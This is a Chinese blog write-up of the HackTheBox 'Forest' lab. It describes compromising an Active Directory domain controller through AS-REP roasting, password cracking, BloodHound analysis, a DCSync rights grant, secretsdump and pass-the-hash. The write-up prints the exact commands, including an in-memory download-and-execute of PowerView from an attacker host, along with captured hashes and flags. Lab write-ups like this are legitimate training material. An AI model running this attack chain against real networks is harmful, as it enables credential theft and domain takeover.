HTB-oscplike-Forest

最新推荐文章于 2024-05-19 20:37:10 发布
最新推荐文章于 2024-05-19 20:37:10 发布
阅读量2.5k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124086087
版权

HTB-oscplike-Forest

easy难度的forest 靶机IP 10.10.10.161

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

咋恁多啊 这里可以看到是个域环境 域渗透属实不太熟
一个个来 首先53的dns dig axfr @10.10.10.161 htb.local 没法zone transfer
smb也没什么东西 往下看到这个5985端口我就顿悟了 必然是通过winrm打进去

那么很明显 我们需要的就是找到一个用户
enum4linux 10.10.10.161 看到几个有用的用户
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[john] rid:[0x2581]
user:[yowell] rid:[0x2583]
user:[test123] rid:[0x2584]

把用户名拿去爆破 枚举不需要Kerberos预身份验证的用户
impacket-GetNPUsers htb.local/ -usersfile temp.txt -dc-ip 10.10.10.161
得到svc-alfresco用户以及hash

$krb5asrep 23 23 23svc-alfresco@HTB.LOCAL:5efea66ebcf4b4b5f73aa0fecd46b2ec$d1eb4cc0eb7c36ca35c35048e6d348341ac3d685feb147b589d01bb52f69b3d48df2c6cec38d578504fe683424f4b56667ffc05e54a57c61460ea8238b896d3b78269b337b879eae3a5dc3616a171a1c931de563aa425c519b5df5c7b0349ae87a8dea9c69e91f446f85607aba99463bbdef90bba22ed96a807ba8a4d2c514a5eefce39e3d63926e04066dff6e21dbc3f05194679d2b7b53da59905460dc2295ee182ba1f502dfe63e40c3d00b30cd1feeb908110c020d225d9524c4f7152019ec80677baf0f2d210c3f8e44b729453488679f08b8f77f548ed225103760f5505f50f6eb42b5

随便john或者hashcat解一下 这里hashcat -m是18200 得到密码s3rvice
直接evil-winrm连上去

既然进了域 那必然是bloodhound
sudo neo4j start 再打开bloodhound 这里evil-winrm可以直接upload SharpHound.exe
执行之后把那个数据库文件download下来 在bloodhound里分析可以看到
请添加图片描述

可以看到我们隶属于account operator 是可以添加用户的
而Exchange Windows peimission可以用writedacl进行移动
那很明显我们就是要先利用account operator添加用户到Exchange Windows peimission组
然后利用writedacl给这个用户添加DCSync权限 欺骗域控从而获取全部的哈希

net user oreo oreoreo /add /domain
net group ‘Exchange Windows Permissions’ /add oreo
这里我本来想以oreo为凭据弹shell的 但是发现没权限 所以可以直接加到winrm的组里
net localgroup ‘Remote Management Users’ /add oreo
再evil-winrm登上去

首先要传一个powerview上去 直接参照bloodhound给的操作是不行的
The term ‘Add-DomainObjectAcl’ is not recognized as the name of a cmdlet

然后这里可以直接参照bloodhound给出的操作
也可以直接在powerview后面直接追加
Add-DomainObjectAcl -TargetIdentity “DC=htb,DC=local” -PrincipalIdentity oreo -Rights DCSync
因为我已经连上oreo了 就不用搞什么凭据之类的了
直接内存执行 iex(new-object system.net.webclient).downloadstring(‘http://10.10.14.21:789/powerview.ps1’)

然后kali直接secretsdump
impacket-secretsdump -dc-ip 10.10.10.161 htb/oreo:oreoreo@10.10.10.161 看到

htb.loca\Administrator:500:aad3b435b51404eeaad3b435b51404ee:
32693b11e6aa90eb43d32c72a07ceea6:::

然后psexec或者evil-winrm随便什么连上去就行了
evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -i 10.10.10.161 连上去拿到flag

ffa579c1d7b31fbf780f9b97eba24eb0
22757d64b29ea55dc8c94a0002593637
这台怎么可能是easy呢 这估计是做到现在最难的一台了

请添加图片描述

ore0
关注
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3176
每台都做一做,然后记录在博客里.供自己和大家一起学习.
htb-beep
m0_55772907的博客
09-15 962
一般
HTB-oscplike-Object
m0_53302733的博客
04-21 3205
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
HTB-Forest
weixin_45434043的博客
03-26 1186
目录HTB-Forest[1]侦擦与枚举[1.1]开放的端口 HTB-Forest [1]侦擦与枚举 [1.1]开放的端口 ·使用nmap扫描开放的端口以及有用的信息 root@kali:~/HTB/Forest# nmap -sC -sV -oA nmap/Forest 10.10.10.161 我们可以发现: 使用Kerberos打开了88端口 通常在Windows Server Dom...
oscp——htb——Joker
王嘟嘟的博客
07-14 530
0x00 前言 这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。 0x01 信息收集 0x02 Web——Webshell 这里有一个3128开放,我找了历史漏洞但是都没有利用成功。 最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。 但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。 使用tftp进行连接 然后获取squid相关内容 /etc/squid/squid.conf /etc/squ
oscp——htb——Europa
王嘟嘟的博客
07-27 342
0x00 前言 0x01 信息收集 0x02 Web——Webshell
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
oscp——HTB——Optimum
王嘟嘟的博客
05-25 542
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 访问一下目标站点,看到是HFS 搜一下payload 发现可以直接使用msf打过去 拿到shell之后就可以拿到user的flag 这里我用cs又建立了一个稳定的连接 0x03 Webshell——Rootshell 首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描 使用MS16-098进行提权 ...
oscp——HTB—— Lame
王嘟嘟的博客
04-13 610
0x00 前言 vulnhub下载,搞环境搞的人心累,还不如试试HTB~ 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。 0x02 usershell and rootshell 我是做完之后回来写的,这里可以直接拿到两个flag 看到samba,拿msf 看一下版本 use auxiliary/scanner/smb/s...
oscp——HTB——Beep
王嘟嘟的博客
05-09 499
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Rootshell 先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入 搜索一下Elastix的历史漏洞 首先看到了一个LFI的洞,下载下来,然后看一下 利用payload进行测试 这里找到了一个admin的密码 jEhdIekWmdjE 可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。 ...
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3947
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
HTB-oscplike-sense+solidstate+node
m0_53302733的博客
03-30 1807
HTB-oscplike-sense+solidstate+node Sense easy难度的sense 靶机IP 10.10.10.60 nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.60 PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/http lighttpd 1.4.35 dirsearch看到changelog.txt
oscp——htb——Mirai
王嘟嘟的博客
08-06 528
0x00 前言 这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题 0x01 信息收集
oscp——htb——Lazy
热门推荐
王嘟嘟的博客
06-29 1万+
0x00 前言 0x01 信息收集 0x02 Web
oscp——HTB——Legacy
王嘟嘟的博客
04-26 551
0x00 前言 乘着网好,赶紧做一做。 难度 入门 1级 (基本没啥难度) 0x01 信息收集 常规上nmap 看了一下目标版本,这里是2003 看到这里看到445以及版本,永恒之蓝没得跑了。 0x02 usershell and rootshell 可以直接开启msf,进行搜索 search smb 获取到shell 首先是找到user.txt 然后找到root.txt ...
HTB-forest
最新发布
2201_75378806的博客
05-19 695
因为比较简单就随笔记了rpcclient 罗列用户user:[mark] rid:[0x47f] user:[santi] rid:[0x480] 利用awk等命令该文本中的用户名提取出来可以使用awk命令来提取文本中的用户名。假设你的文本保存在一个文件中,比如,你可以使用以下命令:​-F'[][]':指定awk使用方括号[]作为字段分隔符。:当行中包含字符串"user:"时,打印第二个字段。使用这个命令,它将提取出文本中所有包含"user:"的行中的用户名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值